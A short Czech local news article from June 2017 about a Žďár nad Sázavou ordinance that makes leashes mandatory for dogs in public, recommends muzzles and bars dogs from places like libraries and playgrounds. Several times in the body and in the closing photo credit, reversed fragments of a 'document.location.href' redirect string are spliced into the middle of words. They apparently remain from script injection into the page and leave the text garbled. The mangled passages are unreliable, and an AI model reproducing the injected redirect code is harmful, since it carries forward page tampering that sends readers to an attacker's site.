Rainbow page separator

Nová vyhláška přikazuje u psa vodítko, náhubek doporučuje

Úterý, 6. června 2017

Žďár nad Sázavou / Vodítko je u psů pohybujících se na veřejných prostranstvích Žďáru povinné, náhubek doporučený. To obsahuje nová vyhláška o veřejném pořádku, kterou v květnu schválili žďárští zastupitelé a jež začala nyní platit. Mimo [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to musí mít majitel či jiný člověk, který psa vede, zvíře pod neustálým dohledem a svým přímým vlivem.
Vyhláška rovněž zakazuje vstup se psy na místa, která jsou označená nápisem Zákaz vstupu se zvířaty, což je kupříkladu městský úřad, knihovna, muzeum, poliklinika, spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toviště, ale i dětská hřiště či pískoviště. Zákaz se nevztahuje na psy slepecké, záchranářské, asistenční a služební.
Předchozí platná norma upravovala pohyb psů ve městě tak, že museli být vedeni na vodítku a současně mít i náhubek. Do nové vyhlášky nebylo schváleno vymezení dvou lokalit ve městě (u řeky poblíž Modrého hřiště a v březovém hájku v Chelčického ulici), kde by zvířata mohla pobíhat na volno.

[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tohalama.com“ target=“_blank“ rel=“noopener noreferrer“>www.pho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tohalama.com